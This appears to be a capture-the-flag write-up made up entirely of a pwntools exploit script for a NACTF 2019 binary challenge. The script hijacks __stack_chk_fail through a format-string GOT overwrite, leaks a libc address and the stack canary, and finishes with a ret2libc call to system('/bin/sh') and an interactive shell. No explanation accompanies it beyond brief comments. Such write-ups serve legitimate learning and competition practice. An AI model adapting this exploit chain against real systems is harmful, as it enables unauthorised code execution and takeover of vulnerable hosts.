Rating:

```
from pwn import *

r= remote('shell.2019.nactf.com', 31732)

__stack_chk_fail = 0x0804c014
_start = 0x08049090

# overwrite __stack_chk_fail() to _start(), then trigger __stack_chk_fail()
# format offset is 7
payload = fmtstr_payload(7, {__stack_chk_fail: _start})
r.sendlineafter('Type something>', payload + 'a'*(64-len(payload))+'aaaaaa')

# trigger __stack_chk_fail()
# leak libc offset , then get system() '/bin/sh' addresses
r.sendlineafter('Type something>', p32(0x0804c018) + '%7$s' +'a'*(64-8) + "aaaa")

r.recvuntil('You typed: ')

libc = ELF('libc.so.6')

r.recv(4)

libc_off = u32(r.recv(4)) - libc.symbols['fwrite']

system_adr = libc_off + libc.symbols['system']

binsh = libc.search('/bin/sh').next() + libc_off

# trigger __stack_chk_fail()
# leak main() canary
r.sendlineafter('Type something>', '%31$x '+'a'*(32-6) + 'b'*36)

r.recvuntil('You typed: ')

canary = int(r.recvuntil(' ').strip(),16)

r.sendlineafter('Type something>', 'a'*64 + p32(canary) + 'a'*12 + p32(system_adr)*2 + p32(binsh))

r.interactive()

```